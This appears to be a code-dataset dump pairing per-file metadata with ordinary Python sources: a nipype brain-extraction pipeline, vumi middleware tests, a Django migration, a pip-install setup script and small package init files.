0.21978
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
742264cd4616cf3ba21074ffcf7f198ab86e0ed1
6,231
py
Python
macapype/pipelines/extract_brain.py
Macatools/macapype
50820e2ab948c91c5362771d51688edd09b72499
[ "BSD-3-Clause" ]
7
2020-07-04T04:04:03.000Z
2022-03-24T14:35:45.000Z
macapype/pipelines/extract_brain.py
Macatools/macapype
50820e2ab948c91c5362771d51688edd09b72499
[ "BSD-3-Clause" ]
95
2020-01-02T16:41:20.000Z
2021-12-07T15:50:41.000Z
macapype/pipelines/extract_brain.py
Macatools/macapype
50820e2ab948c91c5362771d51688edd09b72499
[ "BSD-3-Clause" ]
9
2019-11-14T12:46:14.000Z
2022-01-26T09:44:21.000Z
""" Pipelines for brain extraction """ import nipype.interfaces.utility as niu import nipype.pipeline.engine as pe from nipype.interfaces import ants import nipype.interfaces.fsl as fsl import nipype.interfaces.afni as afni from ..nodes.extract_brain import AtlasBREX from ..utils.utils_nodes import NodeParams, parse_key def create_extract_pipe(params_template, params={}, name="extract_pipe"): """ Description: Extract T1 brain using AtlasBrex Params: - norm_intensity (see `N4BiasFieldCorrection <https://nipype.readthedocs\ .io/en/0.12.1/interfaces/generated/nipype.interfaces.ants.segmentation.\ html#n4biasfieldcorrection>`_ for arguments) - atlas_brex (see :class:`AtlasBREX \ <macapype.nodes.extract_brain.AtlasBREX>` for arguments) - also \ available as :ref:`indiv_params <indiv_params>` Inputs: inputnode: restore_T1: preprocessed (debiased/denoised) T1 file name restore_T2: preprocessed (debiased/denoised)T2 file name arguments: params_template: dictionary of info about template params: dictionary of node sub-parameters (from a json file) name: pipeline name (default = "extract_pipe") Outputs: smooth_mask.out_file: Computed mask (after some smoothing) """ # creating pipeline extract_pipe = pe.Workflow(name=name) # creating inputnode inputnode = pe.Node( niu.IdentityInterface(fields=['restore_T1', 'restore_T2', "indiv_params"]), name='inputnode') # atlas_brex atlas_brex = NodeParams(AtlasBREX(), params=parse_key(params, "atlas_brex"), name='atlas_brex') extract_pipe.connect(inputnode, "restore_T1", atlas_brex, 't1_restored_file') atlas_brex.inputs.NMT_file = params_template["template_head"] atlas_brex.inputs.NMT_SS_file = params_template["template_brain"] extract_pipe.connect( inputnode, ("indiv_params", parse_key, "atlas_brex"), atlas_brex, 'indiv_params') # mask_brex mask_brex = pe.Node(fsl.UnaryMaths(), name='mask_brex') mask_brex.inputs.operation = 'bin' extract_pipe.connect(atlas_brex, 'brain_file', mask_brex, 'in_file') # smooth_mask smooth_mask = pe.Node(fsl.UnaryMaths(), name='smooth_mask') smooth_mask.inputs.operation = "bin" smooth_mask.inputs.args = "-s 1 -thr 0.5 -bin" extract_pipe.connect(mask_brex, 'out_file', smooth_mask, 'in_file') # mult_T1 mult_T1 = pe.Node(afni.Calc(), name='mult_T1') mult_T1.inputs.expr = "a*b" mult_T1.inputs.outputtype = 'NIFTI_GZ' extract_pipe.connect(inputnode, "restore_T1", mult_T1, 'in_file_a') extract_pipe.connect(smooth_mask, 'out_file', mult_T1, 'in_file_b') # mult_T2 mult_T2 = pe.Node(afni.Calc(), name='mult_T2') mult_T2.inputs.expr = "a*b" mult_T2.inputs.outputtype = 'NIFTI_GZ' extract_pipe.connect(inputnode, 'restore_T2', mult_T2, 'in_file_a') extract_pipe.connect(smooth_mask, 'out_file', mult_T2, 'in_file_b') return extract_pipe def create_extract_T1_pipe(params_template, params={}, name="extract_T1_pipe"): """ Description: Extract T1 brain using AtlasBrex Params: - norm_intensity (see `N4BiasFieldCorrection <https://nipype.readthedocs.\ io/en/0.12.1/interfaces/generated/nipype.interfaces.ants.segmentation.html\ #n4biasfieldcorrection>`_ for arguments) - atlas_brex (see :class:`AtlasBREX \ <macapype.nodes.extract_brain.AtlasBREX>` for arguments) - also available \ as :ref:`indiv_params <indiv_params>` Inputs: inputnode: restore_T1: preprocessed (debiased/denoised) T1 file name arguments: params_template: dictionary of info about template params: dictionary of node sub-parameters (from a json file) name: pipeline name (default = "extract_pipe") Outputs: smooth_mask.out_file: Computed mask (after some smoothing) """ # creating pipeline 
extract_pipe = pe.Workflow(name=name) # creating inputnode inputnode = pe.Node( niu.IdentityInterface(fields=['restore_T1', "indiv_params"]), name='inputnode') # N4 intensity normalization with parameters from json norm_intensity = NodeParams(ants.N4BiasFieldCorrection(), params=parse_key(params, "norm_intensity"), name='norm_intensity') extract_pipe.connect(inputnode, 'restore_T1', norm_intensity, "input_image") # atlas_brex atlas_brex = NodeParams(AtlasBREX(), params=parse_key(params, "atlas_brex"), name='atlas_brex') extract_pipe.connect(norm_intensity, "output_image", atlas_brex, 't1_restored_file') atlas_brex.inputs.NMT_file = params_template["template_head"] atlas_brex.inputs.NMT_SS_file = params_template["template_brain"] extract_pipe.connect( inputnode, ("indiv_params", parse_key, "atlas_brex"), atlas_brex, 'indiv_params') # mask_brex mask_brex = pe.Node(fsl.UnaryMaths(), name='mask_brex') mask_brex.inputs.operation = 'bin' extract_pipe.connect(atlas_brex, 'brain_file', mask_brex, 'in_file') # smooth_mask smooth_mask = pe.Node(fsl.UnaryMaths(), name='smooth_mask') smooth_mask.inputs.operation = "bin" smooth_mask.inputs.args = "-s 1 -thr 0.5 -bin" extract_pipe.connect(mask_brex, 'out_file', smooth_mask, 'in_file') # mult_T1 mult_T1 = pe.Node(afni.Calc(), name='mult_T1') mult_T1.inputs.expr = "a*b" mult_T1.inputs.outputtype = 'NIFTI_GZ' extract_pipe.connect(inputnode, 'restore_T1', mult_T1, 'in_file_a') extract_pipe.connect(smooth_mask, 'out_file', mult_T1, 'in_file_b') return extract_pipe
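A minimal usage sketch for the pipeline factory above; the template paths and the parent-workflow wiring are hypothetical, and only the create_extract_pipe interface shown in this file is assumed:

import nipype.pipeline.engine as pe

params_template = {
    'template_head': '/templates/NMT_head.nii.gz',    # hypothetical path
    'template_brain': '/templates/NMT_brain.nii.gz',  # hypothetical path
}
extract_pipe = create_extract_pipe(params_template, params={}, name='extract_pipe')

main_wf = pe.Workflow(name='main_wf')
# upstream_node stands in for whatever node produces the debiased T1/T2 images:
# main_wf.connect(upstream_node, 'out_T1', extract_pipe, 'inputnode.restore_T1')
# main_wf.connect(upstream_node, 'out_T2', extract_pipe, 'inputnode.restore_T2')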
30.247573
79
0.640989
731
6,231
5.199726
0.154583
0.066561
0.071034
0.049724
0.837674
0.833465
0.784267
0.784267
0.784267
0.769271
0
0.013118
0.253731
6,231
205
80
30.395122
0.804301
0.319371
0
0.657895
0
0
0.168531
0
0
0
0
0
0
1
0.026316
false
0
0.092105
0
0.144737
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
745a92b2c8ad9dcb7b7a23f1c35b004d8b21958a
9,287
py
Python
vumi/middleware/tests/test_provider_setter.py
seidu626/vumi
62eae205a07029bc7ab382086715694548001876
[ "BSD-3-Clause" ]
199
2015-01-05T09:04:24.000Z
2018-08-15T17:02:49.000Z
vumi/middleware/tests/test_provider_setter.py
seidu626/vumi
62eae205a07029bc7ab382086715694548001876
[ "BSD-3-Clause" ]
187
2015-01-06T15:22:38.000Z
2018-07-14T13:15:29.000Z
vumi/middleware/tests/test_provider_setter.py
seidu626/vumi
62eae205a07029bc7ab382086715694548001876
[ "BSD-3-Clause" ]
86
2015-01-31T02:47:08.000Z
2018-12-01T11:59:47.000Z
"""Tests for vumi.middleware.provider_setter.""" from vumi.middleware.provider_setter import ( StaticProviderSettingMiddleware, AddressPrefixProviderSettingMiddleware, ProviderSettingMiddlewareError) from vumi.tests.helpers import VumiTestCase, MessageHelper class TestStaticProviderSettingMiddleware(VumiTestCase): def setUp(self): self.msg_helper = self.add_helper(MessageHelper()) def mk_middleware(self, config): dummy_worker = object() mw = StaticProviderSettingMiddleware( "static_provider_setter", config, dummy_worker) mw.setup_middleware() return mw def test_set_provider_on_inbound_if_unset(self): """ The statically configured provider value is set on inbound messages that have no provider. """ mw = self.mk_middleware({"provider": "MY-MNO"}) msg = self.msg_helper.make_inbound(None) self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_replace_provider_on_inbound_if_set(self): """ The statically configured provider value replaces any existing provider a message may already have set. """ mw = self.mk_middleware({"provider": "MY-MNO"}) msg = self.msg_helper.make_inbound(None, provider="YOUR-MNO") self.assertEqual(msg.get("provider"), "YOUR-MNO") processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_on_outbound_if_unset(self): """ Outbound messages are left as they are. """ mw = self.mk_middleware({"provider": "MY-MNO"}) msg = self.msg_helper.make_outbound(None) self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_outbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") class TestAddressPrefixProviderSettingMiddleware(VumiTestCase): def setUp(self): self.msg_helper = self.add_helper(MessageHelper()) def mk_middleware(self, config): dummy_worker = object() mw = AddressPrefixProviderSettingMiddleware( "address_prefix_provider_setter", config, dummy_worker) mw.setup_middleware() return mw def assert_middleware_error(self, msg): [err] = self.flushLoggedErrors(ProviderSettingMiddlewareError) self.assertEqual(str(err.value), msg) def test_set_provider_unique_matching_prefix(self): """ If exactly one prefix matches the address, its corresponding provider value is set on the inbound message. """ mw = self.mk_middleware({"provider_prefixes": { "+123": "MY-MNO", "+124": "YOUR-MNO", }}) msg = self.msg_helper.make_inbound(None, from_addr="+12345") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_longest_matching_prefix(self): """ If more than one prefix matches the address, the provider value for the longest matching prefix is set on the inbound message. """ mw = self.mk_middleware({"provider_prefixes": { "+12": "YOUR-MNO", "+123": "YOUR-MNO", "+1234": "YOUR-MNO", "+12345": "MY-MNO", "+123456": "YOUR-MNO", }}) msg = self.msg_helper.make_inbound(None, from_addr="+12345") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_no_provider_for_no_matching_prefix(self): """ If no prefix matches the address, the provider value will be set to ``None`` on the inbound message. 
""" mw = self.mk_middleware({"provider_prefixes": { "+124": "YOUR-MNO", "+125": "YOUR-MNO", }}) msg = self.msg_helper.make_inbound(None, from_addr="+12345") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), None) def test_set_provider_no_normalize_msisdn(self): """ If exactly one prefix matches the address, its corresponding provider value is set on the inbound message. """ mw = self.mk_middleware({ "provider_prefixes": { "083": "MY-MNO", "+2783": "YOUR-MNO", }, }) msg = self.msg_helper.make_inbound(None, from_addr="0831234567") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_normalize_msisdn(self): """ If exactly one prefix matches the address, its corresponding provider value is set on the inbound message. """ mw = self.mk_middleware({ "normalize_msisdn": {"country_code": "27"}, "provider_prefixes": { "083": "YOUR-MNO", "+2783": "MY-MNO", }, }) msg = self.msg_helper.make_inbound(None, from_addr="0831234567") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_normalize_msisdn_strip_plus(self): """ If exactly one prefix matches the address, its corresponding provider value is set on the inbound message. """ mw = self.mk_middleware({ "normalize_msisdn": {"country_code": "27", "strip_plus": True}, "provider_prefixes": { "083": "YOUR-MNO", "+2783": "YOUR-MNO", "2783": "MY-MNO", }, }) msg = self.msg_helper.make_inbound(None, from_addr="0831234567") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_set_provider_on_outbound(self): """ Outbound messages are left as they are. """ mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_outbound( None, to_addr="+1234567", from_addr="+12345") self.assertEqual(msg.get("provider"), None) processed_msg = mw.handle_outbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "MY-MNO") def test_provider_not_overwritten_for_inbound(self): """ If a provider already exists for an inbound message, it isn't overwritten. """ mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_inbound( None, to_addr="+345", from_addr="+12345", provider="OTHER-MNO") processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "OTHER-MNO") def test_provider_not_overwritten_for_outbound(self): """ If a provider already exists for an outbound message, it isn't overwritten. """ mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_outbound( None, to_addr="+1234567", from_addr="+345", provider="OTHER-MNO") processed_msg = mw.handle_outbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), "OTHER-MNO") def test_provider_logs_no_address_error_for_inbound(self): """ If the from_addr of an inbound message is None, an error should be logged and the message returned. 
""" mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_inbound( None, to_addr="+1234567", from_addr=None) processed_msg = mw.handle_inbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), None) self.assert_middleware_error( "Address for determining message provider cannot be None," " skipping message") def test_provider_logs_no_address_error_for_outbound(self): """ If the to_addr of an outbound message is None, an error should be logged and the message returned. """ mw = self.mk_middleware({"provider_prefixes": {"+123": "MY-MNO"}}) msg = self.msg_helper.make_outbound( None, to_addr=None, from_addr="+345") processed_msg = mw.handle_outbound(msg, "dummy_connector") self.assertEqual(processed_msg.get("provider"), None) self.assert_middleware_error( "Address for determining message provider cannot be None," " skipping message")
41.459821
79
0.630343
1,069
9,287
5.25725
0.119738
0.059786
0.059786
0.04484
0.81032
0.800356
0.774733
0.748221
0.726335
0.723488
0
0.023092
0.249273
9,287
223
80
41.64574
0.782989
0.142457
0
0.650685
0
0
0.177454
0.006897
0
0
0
0
0.191781
1
0.130137
false
0
0.013699
0
0.171233
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
74786f79345d33d879c08d04d1f7b830de6cd146
11
py
Python
tall.py
philiptrae/teknakurs
50f37fe14daaeca952b97cb3e49cf8c609a7475f
[ "MIT" ]
null
null
null
tall.py
philiptrae/teknakurs
50f37fe14daaeca952b97cb3e49cf8c609a7475f
[ "MIT" ]
null
null
null
tall.py
philiptrae/teknakurs
50f37fe14daaeca952b97cb3e49cf8c609a7475f
[ "MIT" ]
1
2020-03-02T18:09:41.000Z
2020-03-02T18:09:41.000Z
a = [1, 2, 3]
5.5
10
0.363636
4
11
1
1
0
0
0
0
0
0
0
0
0
0
0.3
0.090909
11
1
11
11
0.1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
74997f909a3788cec02da019c265634f6d10dad6
91
py
Python
src/__init__.py
sarthaxxxxx/AAI-ALS
48703525eb3490e2ba5cb555dc69fd9d10bf859a
[ "MIT" ]
1
2021-06-03T04:16:10.000Z
2021-06-03T04:16:10.000Z
src/__init__.py
sarthaxxxxx/AAI-ALS
48703525eb3490e2ba5cb555dc69fd9d10bf859a
[ "MIT" ]
null
null
null
src/__init__.py
sarthaxxxxx/AAI-ALS
48703525eb3490e2ba5cb555dc69fd9d10bf859a
[ "MIT" ]
null
null
null
from .loss import *
from .models import *
from .tools import *
from .runner import trainer
18.2
27
0.747253
13
91
5.230769
0.538462
0.441176
0
0
0
0
0
0
0
0
0
0
0.175824
91
4
28
22.75
0.906667
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
74a2689f039096440175d756bf6f41e9552c7d9e
181
py
Python
django/contrib/gis/gdal/base.py
jpmallarino/django
659d2421c7adbbcd205604002d521d82d6b0b465
[ "BSD-3-Clause", "0BSD" ]
61,676
2015-01-01T00:05:13.000Z
2022-03-31T20:37:54.000Z
checkerista/.env/Lib/site-packages/django/contrib/gis/gdal/base.py
LybaFatimaNasir/CS311S20PID02
bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39
[ "MIT" ]
8,884
2015-01-01T00:12:05.000Z
2022-03-31T19:53:11.000Z
checkerista/.env/Lib/site-packages/django/contrib/gis/gdal/base.py
LybaFatimaNasir/CS311S20PID02
bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39
[ "MIT" ]
33,143
2015-01-01T02:04:52.000Z
2022-03-31T19:42:46.000Z
from django.contrib.gis.gdal.error import GDALException
from django.contrib.gis.ptr import CPointerBase


class GDALBase(CPointerBase):
    null_ptr_exception_class = GDALException
25.857143
55
0.834254
23
181
6.434783
0.608696
0.135135
0.22973
0.27027
0
0
0
0
0
0
0
0
0.104972
181
6
56
30.166667
0.91358
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
1
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
77706b655274f443964d068b9edb8b67d0fad362
65
py
Python
aula18.py
lhardt/PythonCourse
c0654bfc589f5faf1c26f419917683a0a2d6a0de
[ "MIT" ]
null
null
null
aula18.py
lhardt/PythonCourse
c0654bfc589f5faf1c26f419917683a0a2d6a0de
[ "MIT" ]
null
null
null
aula18.py
lhardt/PythonCourse
c0654bfc589f5faf1c26f419917683a0a2d6a0de
[ "MIT" ]
null
null
null
# No copy: appending the list itself stores an alias (a reference)
meta.append(arr)

# Shallow copy: arr[:] creates a new list that still shares the elements
meta.append(arr[:])
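Because alias, shallow copy, and deep copy are easy to conflate, here is a small self-contained contrast; the `meta`/`arr` names mirror the snippet, and `copy.deepcopy` is the extra case the snippet does not cover:

import copy

arr = [[1, 2], [3, 4]]
meta = []

meta.append(arr)                 # alias: the same list object
meta.append(arr[:])              # shallow copy: new list, shared inner lists
meta.append(copy.deepcopy(arr))  # deep copy: inner lists duplicated too

arr[0][0] = 99
print(meta[0][0][0])  # 99 -> the alias sees the change
print(meta[1][0][0])  # 99 -> the shallow copy shares the inner list
print(meta[2][0][0])  # 1  -> the deep copy is fully independent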
10.833333
19
0.692308
10
65
4.5
0.6
0.355556
0.622222
0.755556
0
0
0
0
0
0
0
0
0.138462
65
5
20
13
0.803571
0.338462
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0
0
0
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
77745557be22d6ecd552560854aa1ad92ae5e98d
142
py
Python
setup.py
Shakil-Mahmud-Programmer/Currency-Exchange-System-GUI-
7bcd342591edf9468fc1da80242966ff76a41772
[ "MIT" ]
null
null
null
setup.py
Shakil-Mahmud-Programmer/Currency-Exchange-System-GUI-
7bcd342591edf9468fc1da80242966ff76a41772
[ "MIT" ]
null
null
null
setup.py
Shakil-Mahmud-Programmer/Currency-Exchange-System-GUI-
7bcd342591edf9468fc1da80242966ff76a41772
[ "MIT" ]
null
null
null
import subprocess
import sys

# Pass the command as an argument list (a plain string would need a shell)
# and invoke pip via the running interpreter to target the right environment.
subprocess.run([sys.executable, '-m', 'pip', 'install', 'tk'])
subprocess.run([sys.executable, '-m', 'pip', 'install', 'requests'])
subprocess.run([sys.executable, '-m', 'pip', 'install', 'pycopy-webbrowser'])
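A slightly more defensive version of the same setup step — a sketch, not part of the original file — wraps the calls in a helper and uses check=True so a failed install raises instead of passing silently:

import subprocess
import sys

def pip_install(*packages):
    """Install each package with the interpreter's own pip; raise on failure."""
    for package in packages:
        subprocess.run(
            [sys.executable, "-m", "pip", "install", package],
            check=True,
        )

pip_install("tk", "requests", "pycopy-webbrowser")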
28.4
48
0.78169
18
142
6.166667
0.5
0.351351
0.432432
0.621622
0
0
0
0
0
0
0
0
0.105634
142
4
49
35.5
0.874016
0
0
0
0
0
0.456522
0
0
0
0
0
0
1
0
true
0
0.25
0
0.25
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
6
77b2369349daaf703172e5a5b0f7043175b7576e
203
py
Python
jova/splits/__init__.py
bbrighttaer/jova_baselines
336ec88e6069e16ab959cbd38aa58730e15e2e0a
[ "MIT" ]
3
2020-08-17T22:03:34.000Z
2021-09-08T11:52:24.000Z
jova/splits/__init__.py
bbrighttaer/jova_baselines
336ec88e6069e16ab959cbd38aa58730e15e2e0a
[ "MIT" ]
null
null
null
jova/splits/__init__.py
bbrighttaer/jova_baselines
336ec88e6069e16ab959cbd38aa58730e15e2e0a
[ "MIT" ]
1
2020-12-21T12:10:04.000Z
2020-12-21T12:10:04.000Z
""" Gathers all splitters in one place for convenient imports """ from __future__ import print_function from __future__ import division from __future__ import unicode_literals from .splitters import *
20.3
57
0.817734
26
203
5.846154
0.653846
0.197368
0.315789
0
0
0
0
0
0
0
0
0
0.142857
203
9
58
22.555556
0.873563
0.280788
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0.25
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
77e4715af0db51c9efb74a294431a3d9065c3e56
86
py
Python
pipeline/loggers/__init__.py
HSE-LAMBDA/RheologyReconstruction
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
[ "Apache-2.0" ]
1
2021-01-12T11:43:31.000Z
2021-01-12T11:43:31.000Z
pipeline/loggers/__init__.py
HSE-LAMBDA/RheologyReconstruction
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
[ "Apache-2.0" ]
null
null
null
pipeline/loggers/__init__.py
HSE-LAMBDA/RheologyReconstruction
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
[ "Apache-2.0" ]
null
null
null
from .tensorboard_logger import TensorboardLogger
# from .logger import GenericLogger
28.666667
49
0.860465
9
86
8.111111
0.666667
0.328767
0
0
0
0
0
0
0
0
0
0
0.104651
86
2
50
43
0.948052
0.383721
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7acf02d76b945702db1d5fb40d686d68a034532f
48
py
Python
neispy/__init__.py
kijk2869/neispy
c6ff7982d35660d2d2bf69e8cef67b37e6137374
[ "MIT" ]
null
null
null
neispy/__init__.py
kijk2869/neispy
c6ff7982d35660d2d2bf69e8cef67b37e6137374
[ "MIT" ]
null
null
null
neispy/__init__.py
kijk2869/neispy
c6ff7982d35660d2d2bf69e8cef67b37e6137374
[ "MIT" ]
null
null
null
from .client import Client
from .error import *
16
26
0.770833
7
48
5.285714
0.571429
0
0
0
0
0
0
0
0
0
0
0
0.166667
48
2
27
24
0.925
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7ad381d354b6e8acccb6ace42115a7c9431ad04a
68
py
Python
tests/bad_servers/no_init.py
MSLNZ/msl-loadlib
60f100221774e7c8bac067b50f427fd1d99d2552
[ "MIT" ]
51
2017-02-20T18:13:18.000Z
2022-03-02T21:46:36.000Z
tests/bad_servers/no_init.py
MSLNZ/msl-loadlib
60f100221774e7c8bac067b50f427fd1d99d2552
[ "MIT" ]
31
2017-02-20T18:09:43.000Z
2022-03-02T15:21:37.000Z
tests/bad_servers/no_init.py
MSLNZ/msl-loadlib
60f100221774e7c8bac067b50f427fd1d99d2552
[ "MIT" ]
15
2017-02-20T18:13:25.000Z
2020-04-06T12:27:43.000Z
from msl.loadlib import Server32


class NoInit(Server32):
    pass
11.333333
32
0.75
9
68
5.666667
0.888889
0
0
0
0
0
0
0
0
0
0
0.072727
0.191176
68
5
33
13.6
0.854545
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
bb0bbb9fa3e7e39bf316166058f7301e3221a253
3,053
py
Python
utils/migrations/0001_initial.py
remigermain/chernobyl-disaster.org-backend
28f45a1946c7052246421444522208880369e263
[ "MIT" ]
1
2022-02-16T06:19:06.000Z
2022-02-16T06:19:06.000Z
utils/migrations/0001_initial.py
remigermain/chernobyl-disaster.org-backend
28f45a1946c7052246421444522208880369e263
[ "MIT" ]
1
2022-03-12T01:01:54.000Z
2022-03-12T01:01:54.000Z
utils/migrations/0001_initial.py
remigermain/chernobyl-disaster.org-backend
28f45a1946c7052246421444522208880369e263
[ "MIT" ]
null
null
null
# Generated by Django 3.1.1 on 2020-10-01 10:21

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Issue',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateTimeField(auto_now_add=True)),
                ('created', models.BooleanField(default=False)),
                ('object_id', models.PositiveIntegerField()),
                ('uuid', models.CharField(max_length=200)),
                ('message', models.TextField()),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
                ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='issue_creator', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-id'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateTimeField(auto_now_add=True)),
                ('created', models.BooleanField(default=False)),
                ('email', models.EmailField(max_length=254)),
                ('message', models.TextField()),
                ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='contact_creator', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-id'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Commit',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateTimeField(auto_now_add=True)),
                ('created', models.BooleanField(default=False)),
                ('object_id', models.PositiveIntegerField()),
                ('uuid', models.CharField(max_length=200)),
                ('updated_fields', models.TextField(blank=True, null=True)),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
                ('creator', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='commit_creator', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-id'],
                'abstract': False,
            },
        ),
    ]
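For context, the content_type/object_id pairs in the Issue and Commit tables are Django's generic-relation pattern. A model roughly like the following would generate the Issue entry above; this is a reconstruction for illustration, not the project's actual source:

from django.conf import settings
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models


class Issue(models.Model):
    date = models.DateTimeField(auto_now_add=True)
    created = models.BooleanField(default=False)
    # Generic relation: points at any model instance via its content type + pk.
    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
    object_id = models.PositiveIntegerField()
    content_object = GenericForeignKey("content_type", "object_id")
    uuid = models.CharField(max_length=200)
    message = models.TextField()
    creator = models.ForeignKey(
        settings.AUTH_USER_MODEL, blank=True, null=True,
        on_delete=models.SET_NULL, related_name="issue_creator",
    )

    class Meta:
        ordering = ["-id"]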
44.897059
177
0.580085
297
3,053
5.794613
0.272727
0.032539
0.048809
0.0767
0.732714
0.732714
0.732714
0.732714
0.732714
0.732714
0
0.012733
0.279725
3,053
67
178
45.567164
0.769895
0.01474
0
0.633333
1
0
0.118097
0.025615
0
0
0
0
0
1
0
false
0
0.05
0
0.116667
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
bb20dda4881babcbbe510e339b203dcec69326a1
8,452
py
Python
removDup.py
zsyc/LeetAlgo
70793a26900824e308f69ec2b2299e04eb9c7646
[ "MIT" ]
null
null
null
removDup.py
zsyc/LeetAlgo
70793a26900824e308f69ec2b2299e04eb9c7646
[ "MIT" ]
null
null
null
removDup.py
zsyc/LeetAlgo
70793a26900824e308f69ec2b2299e04eb9c7646
[ "MIT" ]
null
null
null
